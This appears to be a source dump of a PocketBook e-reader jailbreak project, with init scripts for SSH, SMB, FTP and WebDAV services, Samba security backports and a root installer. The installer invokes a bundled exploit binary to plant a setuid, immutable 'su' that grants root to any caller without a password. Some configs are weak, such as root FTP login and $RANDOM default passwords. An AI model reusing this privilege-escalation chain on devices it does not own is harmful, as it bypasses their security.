--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/4/rndis_host.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/4/rndis_host.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_iso8859-13.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_iso8859-13.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_iso8859-14.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_iso8859-14.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_iso8859-15.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_iso8859-15.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_iso8859-2.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_iso8859-2.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_iso8859-3.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_iso8859-3.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_iso8859-4.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_iso8859-4.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_iso8859-5.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_iso8859-5.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_iso8859-6.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_iso8859-6.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_iso8859-7.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_iso8859-7.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_iso8859-9.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_iso8859-9.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/ion-kernel-use-demo.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/ion-kernel-use-demo.ko.gz
--------------------------------------------------------------------------------
/svc/etc/init.d/20-smbd.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ##SMB server
3 | smbd -D -s /mnt/secure/etc/samba/smb.conf
4 | nmbd -D -s /mnt/secure/etc/samba/smb.conf
5 |
--------------------------------------------------------------------------------
/svc/etc/init.d/10-sshd.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ##SSH server
3 | exec /mnt/secure/bin/dropbear -m -b /mnt/secure/etc/motd -B -Y "$(cat /mnt/secure/etc/passwd)" -H /mnt/secure
4 |
--------------------------------------------------------------------------------
/svc/bin/ins_usb_mod.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | DIR=/sys/class/android_usb/android0
3 | echo "/dev/user_int" > ${DIR}/f_mass_storage/lun/file
4 | echo "/dev/user_ext" > ${DIR}/f_mass_storage/lun1/file
5 |
--------------------------------------------------------------------------------
/svc/etc/init.d/00-cpufreq.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ##CPU frequency scaling
3 | cd /sys/devices/system/cpu/cpu0/cpufreq
4 | cat cpuinfo_min_freq > scaling_min_freq
5 | cat cpuinfo_max_freq > scaling_max_freq
6 |
--------------------------------------------------------------------------------
/svc/etc/firewall:
--------------------------------------------------------------------------------
1 | *filter
2 | :INPUT ACCEPT [0:0]
3 | :FORWARD ACCEPT [0:0]
4 | :OUTPUT ACCEPT [0:0]
5 | -A INPUT -s 169.254.0.0/16 -i rndis0 -j ACCEPT
6 | -A INPUT -s 169.254.0.0/16 -i eth0 -j DROP
7 | COMMIT
8 |
--------------------------------------------------------------------------------
/svc/etc/init.d/40-httpd.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ##HTTP & WebDAV server
3 | mkdir /mnt/ext1/public_html
4 | if [ "$1" != "" ]; then
5 | ln -s $0 /tmp/service.$1
6 | fi
7 | lighttpd -f /mnt/secure/etc/lighttpd.conf
8 |
--------------------------------------------------------------------------------
/svc/bin/usb_test.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | if [ "$1" == "query" ]; then
3 | USB_STATE=$(cat /sys/class/android_usb/f_mass_storage/device/state | tr -d " \n")
4 | [ "$USB_STATE" = "CONFIGURED" ] && exit 99
5 | fi
6 | exit 0
7 |
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "dropbear-hacks"]
2 | path = dropbear-hacks
3 | url = https://github.com/ezdiy/dropbear-hacks
4 | [submodule "linux-pine64"]
5 | path = linux-pine64
6 | url = https://github.com/ezdiy/linux-pine64
7 | depth = 1
--------------------------------------------------------------------------------
/svc/etc/init.d/01-tzfix.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | umount /etc/localtime
3 | cp -Lf /etc/localtime /var/tmp/localtime
4 | cp -af /mnt/secure/etc/terminfo /var/tmp/terminfo
5 | mount -o bind /var/tmp/localtime /etc/localtime
6 | mount -o bind /var/tmp/terminfo /usr/share/terminfo
7 |
8 |
--------------------------------------------------------------------------------
/svc/bin/netagent:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | case "$1" in
3 | disconnect)
4 | touch /var/tmp/disconnect_pending
5 | exit 0
6 | ;;
7 | connect*)
8 | rm -f /var/tmp/disconnect_pending
9 | ;;
10 | net)
11 | rm -f /var/tmp/disconnect_pending
12 | ;;
13 | esac
14 |
15 | exec /var/tmp/netagent.orig $*
16 |
--------------------------------------------------------------------------------
/svc/bin/applysettings.app:
--------------------------------------------------------------------------------
1 | #!/mnt/secure/su /bin/sh
2 | iv2sh SetActiveTask `pidof settings.app` 0
3 | export PATH=/mnt/secure/bin:$PATH
4 | dialog 1 "" "Do you really want restart the device?" "Yes" "No"
5 | if [ $? != 1 ]; then
6 | exit 0
7 | fi
8 | iptables-save > /mnt/secure/etc/firewall
9 | sync
10 | /sbin/reboot
11 |
--------------------------------------------------------------------------------
/svc/etc/init.d/00-net.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ifconfig lo up 127.0.0.1
3 |
4 | # cca 100 seconds to drop dead tcp sessions
5 | sysctl -w net.ipv4.tcp_retries2=9
6 |
7 | # fix for slow smb mounts etc
8 | umount /etc/hosts
9 | (cat /etc/hosts;echo 127.0.0.1 `hostname`) >> /var/tmp/hosts
10 | mount -o bind /var/tmp/hosts /etc/hosts
11 |
12 |
--------------------------------------------------------------------------------
/svc/etc/proftpd.conf:
--------------------------------------------------------------------------------
1 | ServerType standalone
2 | Port 21
3 | DefaultTransferMode binary
4 | DefaultAddress 0.0.0.0
5 | DefaultServer on
6 | RootLogin on
7 | AuthUserFile /mnt/secure/etc/ftpd.passwd
8 |
9 | User ftp
10 | Group ftp
11 |
12 | DenyAll
13 |
14 | UserAlias anonymous ftp
15 |
16 |
17 |
--------------------------------------------------------------------------------
/svc/bin/rm_usb_mod.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | DIR=/sys/class/android_usb/android0
3 | echo > ${DIR}/f_mass_storage/lun/file
4 | echo > ${DIR}/f_mass_storage/lun1/file
5 | echo > ${DIR}/f_mass_storage/lun2/file
6 |
7 | # Resume services that request it
8 | export PATH=/mnt/secure/bin:/sbin:/usr/sbin:$PATH
9 | for f in /tmp/resume.*; do
10 | if [ -O "$f" ]; then
11 | "$f"
12 | fi
13 | done
14 |
--------------------------------------------------------------------------------
/su.c:
--------------------------------------------------------------------------------
1 | #define _GNU_SOURCE
2 | #include
3 | #include
4 |
5 | int main(int argc, char **argv) {
6 | char *us = argv[0];
7 | gid_t groups[128];
8 | setresuid(0,0,0);
9 | setresgid(0,0,0);
10 | setgroups(getgroups(128, groups)+1, groups);
11 | if (argc < 2) {
12 | puts("usage: su [program] [args...]");
13 | return 0;
14 | }
15 | return execvp(argv[1], argv + 1);
16 | }
17 |
18 |
--------------------------------------------------------------------------------
/svc/etc/motd:
--------------------------------------------------------------------------------
1 | ==================================================================
2 | PocketBook unix services
3 | ==================================================================
4 | Discuss: https://www.mobileread.com/forums/showthread.php?t=325185
5 | Updates: http://github.com/ezdiy/pbjb
6 |
7 | Password can be changed from settings menu.
8 | ==================================================================
9 |
--------------------------------------------------------------------------------
/samba-patches/300-assert_debug_level.patch:
--------------------------------------------------------------------------------
1 | --- a/lib/util/util.h
2 | +++ b/lib/util/util.h
3 | @@ -53,7 +53,7 @@ extern const char *panic_action;
4 | #else
5 | /* redefine the assert macro for non-developer builds */
6 | #define SMB_ASSERT(b) do { if (!(b)) { \
7 | - DEBUG(0,("PANIC: assert failed at %s(%d): %s\n", \
8 | + DEBUG(3,("PANIC: assert failed at %s(%d): %s\n", \
9 | __FILE__, __LINE__, #b)); }} while (0)
10 | #endif
11 |
12 |
--------------------------------------------------------------------------------
/plugin-static.h:
--------------------------------------------------------------------------------
1 | // Put lighttpd modules you want enabled in here
2 |
3 | PLUGIN_INIT(mod_openssl)
4 | PLUGIN_INIT(mod_setenv)
5 | PLUGIN_INIT(mod_access)
6 | PLUGIN_INIT(mod_alias)
7 | PLUGIN_INIT(mod_auth)
8 | PLUGIN_INIT(mod_authn_file)
9 | PLUGIN_INIT(mod_redirect)
10 | PLUGIN_INIT(mod_rewrite)
11 | PLUGIN_INIT(mod_expire)
12 | PLUGIN_INIT(mod_cgi)
13 | PLUGIN_INIT(mod_ssi)
14 | PLUGIN_INIT(mod_indexfile)
15 | PLUGIN_INIT(mod_simple_vhost)
16 | PLUGIN_INIT(mod_dirlisting)
17 | PLUGIN_INIT(mod_staticfile)
18 | PLUGIN_INIT(mod_webdav)
19 |
20 |
--------------------------------------------------------------------------------
/svc/etc/rcS:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | export PATH=/mnt/secure/bin:/sbin:/usr/sbin:$PATH
3 | chmod 755 /mnt/secure
4 | sleep 2
5 | # safety escape
6 | kc=$(dmesg | grep gpio_keys_gpio_isr | wc -l)
7 | if [ $kc -gt 10 ]; then
8 | exit
9 | fi
10 | export PATH=/mnt/secure/bin:/sbin:/usr/sbin:$PATH
11 | . /mnt/ext1/system/config/rootsettings.cfg
12 | for f in /mnt/ext1/system/init.d/*.sh /mnt/secure/etc/init.d/*.sh; do
13 | n=${f##*/}
14 | bn=${n:3}
15 | id=${bn/.sh/}
16 | if [ -f "$f" ] && [ "$(eval echo \${$id})" != "0" ]; then
17 | $f $bn
18 | fi
19 | done
20 |
--------------------------------------------------------------------------------
/svc/bin/sysstat.app:
--------------------------------------------------------------------------------
1 | #!/mnt/secure/su /bin/sh
2 | iv2sh SetActiveTask `pidof settings.app` 0
3 | ip=$(/sbin/ifconfig eth0 |grep 'inet addr' | sed -e 's/.*addr:\([^ ]*\).*/\1/g' | head -1)
4 | if [ "$ip" == "" ]; then
5 | ip="not connected"
6 | fi
7 | svcs=""
8 | function check() {
9 | if [ "$(pidof $1)" != "" ]; then
10 | svcs="$svcs $2"
11 | fi
12 | }
13 | check dropbear SSHD
14 | check lighttpd HTTPD
15 | check smbd SMBD
16 | check proftpd FTPD
17 | dialog 1 "" "Version: $(cat /mnt/secure/.pkgver)
18 | IP: $ip
19 | UP: $svcs
20 | Load: $(cut -d ' ' -f 1-3 < /proc/loadavg)
21 | $(cat /proc/meminfo |egrep "^Mem|^Cached" | sed -e 's/: */: /g')" "OK"
22 |
23 |
--------------------------------------------------------------------------------
/samba-patches/100-configure_fixes.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/configure
2 | +++ b/source3/configure
3 | @@ -13294,10 +13294,7 @@ if test x"$libreplace_cv_HAVE_GETADDRINF
4 | # see bug 5910, use our replacements if we detect
5 | # a broken system.
6 | if test "$cross_compiling" = yes; then :
7 | - { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5
8 | -$as_echo "$as_me: error: in \`$ac_pwd':" >&2;}
9 | -as_fn_error $? "cannot run test program while cross compiling
10 | -See \`config.log' for more details" "$LINENO" 5; }
11 | + $as_echo "assuming valid getaddrinfo without bug 5910" >&2
12 | else
13 | cat confdefs.h - <<_ACEOF >conftest.$ac_ext
14 | /* end confdefs.h. */
15 |
--------------------------------------------------------------------------------
/samba-patches/320-debug_level_checks.patch:
--------------------------------------------------------------------------------
1 | --- a/lib/util/debug.h
2 | +++ b/lib/util/debug.h
3 | @@ -45,7 +45,7 @@ bool dbghdr( int level, const char *loca
4 | * Redefine DEBUGLEVEL because so we don't have to change every source file
5 | * that *unnecessarily* references it.
6 | */
7 | -#define DEBUGLEVEL DEBUGLEVEL_CLASS[DBGC_ALL]
8 | +#define DEBUGLEVEL 0
9 |
10 | /*
11 | * Define all new debug classes here. A class is represented by an entry in
12 | --- a/source3/nmbd/asyncdns.c
13 | +++ b/source3/nmbd/asyncdns.c
14 | @@ -85,7 +85,7 @@ static void asyncdns_process(void)
15 | struct query_record r;
16 | unstring qname;
17 |
18 | - DEBUGLEVEL = -1;
19 | + DEBUGLEVEL_CLASS[DBGC_ALL] = -1;
20 |
21 | while (1) {
22 | NTSTATUS status;
23 |
--------------------------------------------------------------------------------
/svc/etc/init.d/02-usb.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ##USBnet
3 | for n in ins_usbnet rm_usbnet ins_usb_mod rm_usb_mod usb_test; do
4 | umount /lib/modules/$n.sh
5 | done
6 | cp -af /mnt/secure/bin/*.sh /var/tmp/
7 | mount -o bind /var/tmp/ins_usb_mod.sh /lib/modules/ins_usb_mod.sh
8 | mount -o bind /var/tmp/rm_usb_mod.sh /lib/modules/rm_usb_mod.sh
9 | mount -o bind /var/tmp/usb_test.sh /lib/modules/usb_test.sh
10 | mount -o bind /var/tmp/empty.sh /lib/modules/ins_usbnet.sh
11 | mount -o bind /var/tmp/empty.sh /lib/modules/rm_usbnet.sh
12 | cd /sys/class/android_usb/android0
13 | for t in 0 1 2; do
14 | echo 0 > enable
15 | echo rndis,mass_storage > functions
16 | echo 1 > enable
17 | sleep $t
18 | if ifconfig rndis0 up 169.254.0.1; then
19 | cat << EOF > /var/run/udhcpd.conf
20 | start 169.254.0.2
21 | end 169.254.255.254
22 | interface rndis0
23 | opt subnet 255.255.0.0
24 | lease_file /tmp/rndis.leases
25 | EOF
26 | /sbin/udhcpd /var/run/udhcpd.conf
27 | exit
28 | fi
29 | sleep $t
30 | done
31 |
--------------------------------------------------------------------------------
/samba-patches/029-CVE-2017-7494-v3-6.patch:
--------------------------------------------------------------------------------
1 | From d2bc9f3afe23ee04d237ae9f4511fbe59a27ff54 Mon Sep 17 00:00:00 2001
2 | From: Volker Lendecke
3 | Date: Mon, 8 May 2017 21:40:40 +0200
4 | Subject: [PATCH] CVE-2017-7494: rpc_server3: Refuse to open pipe names with /
5 | inside
6 |
7 | Bug: https://bugzilla.samba.org/show_bug.cgi?id=12780
8 |
9 | Signed-off-by: Volker Lendecke
10 | Reviewed-by: Jeremy Allison
11 | Reviewed-by: Stefan Metzmacher
12 | ---
13 | source3/rpc_server/srv_pipe.c | 5 +++++
14 | 1 file changed, 5 insertions(+)
15 |
16 | --- a/source3/rpc_server/srv_pipe.c
17 | +++ b/source3/rpc_server/srv_pipe.c
18 | @@ -473,6 +473,11 @@ bool is_known_pipename(const char *cli_f
19 | pipename += 1;
20 | }
21 |
22 | + if (strchr(pipename, '/')) {
23 | + DEBUG(1, ("Refusing open on pipe %s\n", pipename));
24 | + return false;
25 | + }
26 | +
27 | if (lp_disable_spoolss() && strequal(pipename, "spoolss")) {
28 | DEBUG(10, ("refusing spoolss access\n"));
29 | return false;
30 |
--------------------------------------------------------------------------------
/svc/etc/init.d/00-setpass.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | if [ -e /mnt/ext1/rootpassword.txt ]; then
3 | password="$(cut -c 10- < /mnt/ext1/rootpassword.txt)"
4 | if [ "$password" == "(keep unchanged)" ]; then
5 | if ! [ -e /mnt/secure/etc/passwd ]; then
6 | password=$RANDOM
7 | echo "password=$password" > /mnt/ext1/rootpassword.txt
8 | fi
9 | fi
10 | if [ "$password" != "(keep unchanged)" ]; then
11 | echo -n "$password" > /mnt/secure/etc/passwd
12 | fi
13 | fi
14 |
15 | suff=":[U ]:LCT-00000001:"
16 | pw="$(cat /mnt/secure/etc/passwd)"
17 | (echo "root:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:"$(ntlmhash "$pw")"$suff"; echo "reader:100:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:"$(ntlmhash "")"$suff") > /mnt/secure/etc/samba/smbpasswd
18 | hpw="$(mkpasswd -m des "$pw")"
19 | echo -e "ftp:*:100:100::/mnt/ext1/public:/bin/false\nroot:$hpw:0:0::/mnt/ext1:/bin/false" > /mnt/secure/etc/ftpd.passwd
20 | dpw=$(echo -n "root:webdav:$pw" | md5sum | cut -b -32)
21 | echo -e "root:webdav:$dpw" > /mnt/secure/etc/htdigest
22 | chmod 600 /mnt/secure/etc/ftpd.passwd /mnt/secure/etc/htdigest
23 |
24 |
--------------------------------------------------------------------------------
/svc/etc/init.d/90-fix.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ##Suspend integration
3 |
4 | umount /ebrmain/bin/netagent
5 | umount /var/tmp/netagent.orig
6 | touch /var/tmp/netagent.orig
7 | mount -o bind /ebrmain/bin/netagent /var/tmp/netagent.orig
8 | mount -o bind /mnt/secure/bin/netagent /ebrmain/bin/netagent
9 |
10 | function monitor() {
11 | while true; do
12 | sleep 30
13 | if ! [ -e /var/tmp/disconnect_pending ]; then
14 | continue
15 | fi
16 |
17 | # Disconnect was requested, but we're vary to do that.
18 | if ps | awk {'print $5'} | grep '^-sh$' > /dev/null; then
19 | continue
20 | fi
21 | if [ `pidof smbd | wc -w` -gt 2 ]; then
22 | continue
23 | fi
24 | if [ `pidof proftpd | wc -w` -gt 1 ]; then
25 | continue
26 | fi
27 | if [ "$(cat /sys/class/power_supply/usb/online)" -eq "1" ]; then
28 | continue
29 | fi
30 | if [ "$(cat /sys/class/power_supply/ac/online)" -eq "1" ]; then
31 | continue
32 | fi
33 |
34 | # Finally disconnect
35 | if ! [ -e /var/tmp/disconnect_pending ]; then
36 | continue
37 | fi
38 | rm -f /var/tmp/disconnect_pending
39 | /var/tmp/netagent.orig disconnect
40 | done
41 | }
42 |
43 | monitor &
44 |
45 |
--------------------------------------------------------------------------------
/samba-patches/030-CVE-2017-15275-v3.6.patch:
--------------------------------------------------------------------------------
1 | From c1a22e59f87783d88dfbaeeb132b89be166b2754 Mon Sep 17 00:00:00 2001
2 | From: Jeremy Allison
3 | Date: Wed, 20 Sep 2017 11:04:50 -0700
4 | Subject: [PATCH 2/2] s3: smbd: Chain code can return uninitialized memory when
5 | talloc buffer is grown.
6 |
7 | Ensure we zero out unused grown area.
8 |
9 | CVE-2017-15275
10 |
11 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=13077
12 |
13 | Signed-off-by: Jeremy Allison
14 | ---
15 | source3/smbd/srvstr.c | 14 ++++++++++++++
16 | 1 file changed, 14 insertions(+)
17 |
18 | --- a/source3/smbd/srvstr.c
19 | +++ b/source3/smbd/srvstr.c
20 | @@ -70,6 +70,20 @@ ssize_t message_push_string(uint8 **outb
21 | DEBUG(0, ("srvstr_push failed\n"));
22 | return -1;
23 | }
24 | +
25 | + /*
26 | + * Ensure we clear out the extra data we have
27 | + * grown the buffer by, but not written to.
28 | + */
29 | + if (buf_size + result < buf_size) {
30 | + return -1;
31 | + }
32 | + if (grow_size < result) {
33 | + return -1;
34 | + }
35 | +
36 | + memset(tmp + buf_size + result, '\0', grow_size - result);
37 | +
38 | set_message_bcc((char *)tmp, smb_buflen(tmp) + result);
39 |
40 | *outbuf = tmp;
41 |
--------------------------------------------------------------------------------
/jailbreak-installer.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | PKGVER=v4
3 | iv2sh SetActiveTask `pidof bookshelf.app` 0
4 | if [ -e /mnt/secure/su ]; then
5 | dialog 2 "" "Do you wish to remove root?" "Yes" "No"
6 | if [ $? != 1 ]; then
7 | exit 0
8 | fi
9 | /mnt/secure/su /bin/chattr -i /mnt/secure/su
10 | /mnt/secure/su /bin/rm -f /mnt/secure/su
11 | if [ -e /mnt/secure/su ]; then
12 | dialog 3 "" "Failed to remove root" "OK"
13 | else
14 | dialog 1 "" "Root removed." "Restart now" "Restart later"
15 | if [ $? == 1 ]; then
16 | sync
17 | iv2sh reboot
18 | fi
19 | fi
20 | exit 0
21 | fi
22 |
23 | dialog 2 "" "Do you wish to install root?
24 |
25 | * This may void warranty.
26 | * The device will reboot on success.
27 | * Failure can be silent.
28 | " "Yes" "No"
29 | if [ $? != 1 ]; then
30 | exit 0
31 | fi
32 |
33 | rm -f /var/tmp/su
34 | rm -f /var/tmp/jailbreak
35 | ARCHIVE=`awk '/^__DATA/ {print NR + 1; exit 0; }' $0`
36 | tail -n+$ARCHIVE $0 | tar xz -C /var/tmp
37 | /tmp/jailbreak "/bin/chmod 755 /mnt/secure;cp -f /tmp/su /mnt/secure/su;/bin/chown 0:0 /mnt/secure/su;/bin/chmod 4755 /mnt/secure/su;/bin/chattr +i /mnt/secure/su;/bin/sync;/sbin/reboot"
38 | if ! [ -e /mnt/secure/su ]; then
39 | dialog 3 "" "Failed to install root" "OK"
40 | fi
41 |
42 | exit 0
43 | __DATA
44 |
--------------------------------------------------------------------------------
/samba-patches/120-add_missing_ifdef.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/librpc/rpc/rpc_common.c
2 | +++ b/source3/librpc/rpc/rpc_common.c
3 | @@ -119,9 +119,11 @@ static bool initialize_interfaces(void)
4 | if (!smb_register_ndr_interface(&ndr_table_netdfs)) {
5 | return false;
6 | }
7 | +#ifdef DEVELOPER
8 | if (!smb_register_ndr_interface(&ndr_table_rpcecho)) {
9 | return false;
10 | }
11 | +#endif
12 | if (!smb_register_ndr_interface(&ndr_table_initshutdown)) {
13 | return false;
14 | }
15 | --- a/source3/rpcclient/rpcclient.c
16 | +++ b/source3/rpcclient/rpcclient.c
17 | @@ -628,7 +628,9 @@ static struct cmd_set *rpcclient_command
18 | netlogon_commands,
19 | srvsvc_commands,
20 | dfs_commands,
21 | +#ifdef DEVELOPER
22 | echo_commands,
23 | +#endif
24 | epmapper_commands,
25 | shutdown_commands,
26 | test_commands,
27 | --- a/source3/rpc_server/srv_pipe.c
28 | +++ b/source3/rpc_server/srv_pipe.c
29 | @@ -433,10 +433,12 @@ static bool check_bind_req(struct pipes_
30 | if (ok) {
31 | context_fns->allow_connect = true;
32 | }
33 | +#ifdef DEVELOPER
34 | ok = ndr_syntax_id_equal(abstract, &ndr_table_rpcecho.syntax_id);
35 | if (ok) {
36 | context_fns->allow_connect = true;
37 | }
38 | +#endif
39 | /*
40 | * every interface can be modified to allow "connect" auth_level by
41 | * using a parametric option like:
42 |
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
1 | # Set up build stage
2 | FROM ubuntu:18.04 AS buildstage
3 | ENV DEBIAN_FRONTEND=noninteractive TZ=Europe/Amsterdam
4 |
5 | RUN dpkg --add-architecture i386
6 |
7 | RUN apt-get update && \
8 | apt-get -y install dh-autoreconf zip wget git build-essential make bc \
9 | libc6:i386 libncurses5:i386 libstdc++6:i386
10 |
11 | ENV ROOTDIR=/pocketbook-jailbreak
12 | WORKDIR ${ROOTDIR}
13 |
14 | # musl toolchain for static linking
15 | RUN wget https://toolchains.bootlin.com/downloads/releases/toolchains/armv7-eabihf/tarballs/armv7-eabihf--musl--stable-2018.11-1.tar.bz2
16 | RUN tar -xvf armv7-eabihf--musl--stable-2018.11-1.tar.bz2
17 | RUN rm armv7-eabihf--musl--stable-2018.11-1.tar.bz2
18 |
19 | # Pocketbook SDK toolchain
20 | RUN wget https://github.com/ezdiy/pocketbook-sdk5/archive/master.tar.gz
21 | RUN tar -xvf master.tar.gz
22 | RUN rm master.tar.gz
23 |
24 | # toolchain for kernel modules
25 | RUN wget https://releases.linaro.org/archive/15.05/components/toolchain/binaries/arm-linux-gnueabihf/gcc-linaro-4.9-2015.05-x86_64_arm-linux-gnueabihf.tar.xz
26 | RUN tar -xvf gcc-linaro-4.9-2015.05-x86_64_arm-linux-gnueabihf.tar.xz
27 | RUN rm gcc-linaro-4.9-2015.05-x86_64_arm-linux-gnueabihf.tar.xz
28 |
29 | ENV PATH="${ROOTDIR}/pocketbook-sdk5-master/bin:${ROOTDIR}/armv7-eabihf--musl--stable-2018.11-1/bin:${ROOTDIR}/gcc-linaro-4.9-2015.05-x86_64_arm-linux-gnueabihf/bin:${PATH}"
30 |
31 | WORKDIR /pbjb
32 |
33 | CMD make
34 |
--------------------------------------------------------------------------------
/samba-patches/010-patch-cve-2015-5252.patch:
--------------------------------------------------------------------------------
1 | From 2e94b6ec10f1d15e24867bab3063bb85f173406a Mon Sep 17 00:00:00 2001
2 | From: Jeremy Allison
3 | Date: Thu, 9 Jul 2015 10:58:11 -0700
4 | Subject: [PATCH] CVE-2015-5252: s3: smbd: Fix symlink verification (file
5 | access outside the share).
6 |
7 | Ensure matching component ends in '/' or '\0'.
8 |
9 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=11395
10 |
11 | Signed-off-by: Jeremy Allison
12 | Reviewed-by: Volker Lendecke
13 | ---
14 | source3/smbd/vfs.c | 7 +++++--
15 | 1 file changed, 5 insertions(+), 2 deletions(-)
16 |
17 | --- a/source3/smbd/vfs.c
18 | +++ b/source3/smbd/vfs.c
19 | @@ -982,6 +982,7 @@ NTSTATUS check_reduced_name(connection_s
20 | if (!allow_widelinks || !allow_symlinks) {
21 | const char *conn_rootdir;
22 | size_t rootdir_len;
23 | + bool matched;
24 |
25 | conn_rootdir = SMB_VFS_CONNECTPATH(conn, fname);
26 | if (conn_rootdir == NULL) {
27 | @@ -992,8 +993,10 @@ NTSTATUS check_reduced_name(connection_s
28 | }
29 |
30 | rootdir_len = strlen(conn_rootdir);
31 | - if (strncmp(conn_rootdir, resolved_name,
32 | - rootdir_len) != 0) {
33 | + matched = (strncmp(conn_rootdir, resolved_name,
34 | + rootdir_len) == 0);
35 | + if (!matched || (resolved_name[rootdir_len] != '/' &&
36 | + resolved_name[rootdir_len] != '\0')) {
37 | DEBUG(2, ("check_reduced_name: Bad access "
38 | "attempt: %s is a symlink outside the "
39 | "share path\n", fname));
40 |
--------------------------------------------------------------------------------
/samba-patches/270-remove_registry_backend.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/lib/smbconf/smbconf_init.c
2 | +++ b/source3/lib/smbconf/smbconf_init.c
3 | @@ -68,9 +68,12 @@ sbcErr smbconf_init(TALLOC_CTX *mem_ctx,
4 | }
5 | }
6 |
7 | +#ifdef REGISTRY_BACKEND
8 | if (strequal(backend, "registry") || strequal(backend, "reg")) {
9 | err = smbconf_init_reg(mem_ctx, conf_ctx, path);
10 | - } else if (strequal(backend, "file") || strequal(backend, "txt")) {
11 | + } else
12 | +#endif
13 | + if (strequal(backend, "file") || strequal(backend, "txt")) {
14 | err = smbconf_init_txt(mem_ctx, conf_ctx, path);
15 | } else if (sep == NULL) {
16 | /*
17 | --- a/source3/lib/netapi/serverinfo.c
18 | +++ b/source3/lib/netapi/serverinfo.c
19 | @@ -557,7 +557,10 @@ static WERROR NetServerSetInfo_l_1005(st
20 | return WERR_INVALID_PARAM;
21 | }
22 |
23 | - if (!lp_config_backend_is_registry()) {
24 | +#ifdef REGISTRY_BACKEND
25 | + if (!lp_config_backend_is_registry())
26 | +#endif
27 | + {
28 | libnetapi_set_error_string(ctx,
29 | "Configuration manipulation requested but not "
30 | "supported by backend");
31 | --- a/source3/smbd/server.c
32 | +++ b/source3/smbd/server.c
33 | @@ -1230,8 +1230,10 @@ extern void build_options(bool screen);
34 | exit(1);
35 | }
36 |
37 | +#ifdef REGISTRY_BACKEND
38 | if (!W_ERROR_IS_OK(registry_init_full()))
39 | exit(1);
40 | +#endif
41 |
42 | /* Open the share_info.tdb here, so we don't have to open
43 | after the fork on every single connection. This is a small
44 |
--------------------------------------------------------------------------------
/samba-patches/032-CVE-2018-1050-v3-6.patch:
--------------------------------------------------------------------------------
1 | From 6cc45e3452194f312e04109cfdae047eb0719c7c Mon Sep 17 00:00:00 2001
2 | From: Jeremy Allison
3 | Date: Tue, 2 Jan 2018 15:56:03 -0800
4 | Subject: [PATCH] CVE-2018-1050: s3: RPC: spoolss server. Protect against null
5 | pointer derefs.
6 |
7 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=11343
8 |
9 | Signed-off-by: Jeremy Allison
10 | ---
11 | source3/rpc_server/spoolss/srv_spoolss_nt.c | 13 +++++++++++++
12 | 1 file changed, 13 insertions(+)
